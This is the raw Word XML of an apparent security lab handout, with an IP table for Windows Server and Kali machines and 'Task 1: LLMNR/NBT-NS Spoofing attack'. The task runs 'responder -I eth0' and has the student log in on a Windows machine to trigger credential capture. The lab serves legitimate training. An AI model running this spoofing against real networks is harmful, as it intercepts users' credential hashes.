              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Win </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>Sr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2016</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>Kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>10.0.2.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>10.0.2.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>10.0.2.15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:trPr>
          <w:trHeight w:val="528"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t>10.0.2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="49" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Settings: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nat Network; allow all VM’s </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="335" w:lineRule="auto"/>
        <w:ind w:right="9385"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Task 1: LLMNR/ NBT-NS Spoofing attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="3287" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Link Local Multicast Name Resolution and Net-Bios Name Service is used by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ responder -I eth0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="759" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5774121" cy="2151279"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9157" name="Group 9157"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5774121" cy="2151279"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5774121" cy="2151279"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="511" name="Rectangle 511"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="7679580" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>windows</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> systems when a DNS is unresolved. By issuing a unauthenticated UDP </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="512" name="Rectangle 512"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175260"/>
                            <a:ext cx="2760246" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>broadcast</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> to its entire network.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="513" name="Rectangle 513"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2075688" y="175260"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="514" name="Rectangle 514"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="426720"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="515" name="Rectangle 515"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="678180"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="516" name="Rectangle 516"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="929639"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="517" name="Rectangle 517"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1181099"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="518" name="Rectangle 518"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1432559"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="519" name="Rectangle 519"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1684019"/>
                            <a:ext cx="56314" cy="276675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="521" name="Rectangle 521"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1933042"/>
                            <a:ext cx="6027311" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:rPr>
                                <w:t>Login using your user credentials in Windows 7 or 10 machine</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="522" name="Rectangle 522"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4530852" y="1933042"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9232" name="Picture 9232"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="209550" y="644144"/>
                            <a:ext cx="647700" cy="390525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9235" name="Picture 9235"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3060700" y="545719"/>
                            <a:ext cx="396875" cy="533400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
